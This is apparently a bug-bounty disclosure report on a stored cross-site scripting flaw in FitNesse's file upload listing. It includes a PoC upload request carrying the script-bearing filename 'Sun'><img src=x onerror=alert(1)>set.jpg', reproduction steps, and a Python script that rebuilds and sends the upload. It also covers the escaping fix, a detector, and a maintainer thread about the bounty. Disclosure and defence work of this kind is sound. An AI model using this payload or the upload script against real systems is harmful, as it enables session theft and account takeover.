Cross-site Scripting (XSS) - Stored in unclebob/fitnesse

Valid

Reported on

Sep 22nd 2021


Description

Stored XSS in the uploaded file name: a file name containing HTML is stored on upload (Tools > Files) and rendered unescaped in the file listing, so arbitrary JavaScript runs in the browser of any user who views that page.

Proof of Concept

// PoC Request
POST /files/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------82050748222730013181475300839
Content-Length: 71559
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/files/
Cookie: textwrapon=false; textautoformat=false; wysiwyg=textarea
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="responder"

upload
-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

ÿØÿàJFIF``ÿí ... (binary JPEG data, truncated)
-----------------------------82050748222730013181475300839--

Steps to reproduce

From the menu choose Tools > Files.

Upload a file whose name contains the payload: Sun'><img src=x onerror=alert(1)>set.jpg

The leading '> closes the attribute the name is written into, and the injected img element fires alert(1) when the /files/ listing is viewed.

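The upload and the rendering defect behind it, as an added example in Python that is not part of the report or of FitNesse's code. build_upload_request rebuilds the report's POST /files/ request byte for byte from the payload file name; the two render_row functions are hypothetical listing rows (not FitNesse's template and not the content of fix commit cc7e58) that reproduce the single-quoted attribute context the payload targets, raw and then HTML-escaped on output; event_handler_attrs parses the result the way a browser would and reports any on* attribute, which is the check a reviewer would run against both. The JPEG bytes are a constructed minimal header, and the host and port are assumptions.

```python
import socket
import uuid
from html import escape
from html.parser import HTMLParser

# Payload file name taken from the report; the JPEG bytes are a constructed
# minimal header, enough to look like an image to a magic-byte check.
PAYLOAD_FILENAME = "Sun'><img src=x onerror=alert(1)>set.jpg"
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"


def build_upload_request(filename: str, content: bytes,
                         host: str = "localhost:8081") -> bytes:
    """Rebuild the report's POST /files/ upload as raw HTTP/1.1 bytes.

    Only the parts the upload responder needs are sent: responder=upload and
    the file part. The file name goes into Content-Disposition verbatim,
    which is where the payload lives.
    """
    if '"' in filename:
        raise ValueError("double quotes would need escaping in Content-Disposition")
    boundary = "----fitnesse-poc-" + uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="responder"\r\n\r\n'
        "upload\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    head = (
        "POST /files/ HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    return head + body


def send_raw(request: bytes, host: str = "localhost", port: int = 8081) -> bytes:
    """Deliver the raw request to a running FitNesse (assumed at localhost:8081)
    and return the reply. Needs the network; the offline checks do not use it."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Rendering side: a hypothetical listing row, before and after escaping.

def render_row_vulnerable(filename: str) -> str:
    """Hypothetical row that interpolates the stored name raw into a
    single-quoted href attribute and the link text (not FitNesse's template)."""
    return f"<tr><td><a href='files/{filename}'>{filename}</a></td></tr>"


def render_row_fixed(filename: str) -> str:
    """Same row with the name HTML-escaped on output; quote=True also turns
    ' and " into entities, so the attribute cannot be closed early."""
    safe = escape(filename, quote=True)
    return f"<tr><td><a href='files/{safe}'>{safe}</a></td></tr>"


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def event_handler_attrs(rendered: str) -> list:
    """Parse the HTML as a browser would and list every (tag, on*-attribute)
    pair; any hit means a script-bearing element was injected."""
    p = _TagCollector()
    p.feed(rendered)
    p.close()
    return [(tag, name) for tag, attrs in p.tags
            for name in attrs if name.lower().startswith("on")]


if __name__ == "__main__":
    req = build_upload_request(PAYLOAD_FILENAME, JPEG_HEADER)
    print(req.decode("latin-1"))
    print("vulnerable:", event_handler_attrs(render_row_vulnerable(PAYLOAD_FILENAME)))
    print("fixed:     ", event_handler_attrs(render_row_fixed(PAYLOAD_FILENAME)))
```

Escaping on output is the fix that matters; the href should additionally be percent-encoded as a URL, and restricting accepted file names at upload time is defense in depth, not a substitute, because the stored name is rendered in more than one place.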

Impact

The injected script runs for every user who views the file listing, so it can be used to steal that user's cookies and gain unauthorized access to their account with the stolen cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Ziding Zhang
2 months ago

Admin


Hey @noobpk, I've emailed the maintainers for you.

lethanhphuc
2 months ago

Researcher


@zidingz Ah. So you will update this report on behalf of the maintainers?

We have contacted a member of the unclebob/fitnesse team and are waiting to hear back 2 months ago
unclebob validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
unclebob confirmed that a fix has been merged on cc7e58 2 months ago
The fix bounty has been dropped
lethanhphuc
2 months ago

Researcher


Hi, is there any mistake in the bounty placed? When I wrote the report it was $25.

lethanhphuc
2 months ago

Researcher


@admin Is it possible to review the bounty for this XSS vulnerability?

Jamie Slome
2 months ago

Admin


@lethanhphuc - it looks like the maintainer selected this bounty when rewarding the report.

lethanhphuc
2 months ago

Researcher


@admin I think there should be suggestions about bounties for maintainers when they reward researchers. :(( $5 is too little.

Jamie Slome
2 months ago

Admin


If you would like to make a feature request, feel free to add it to our public roadmap.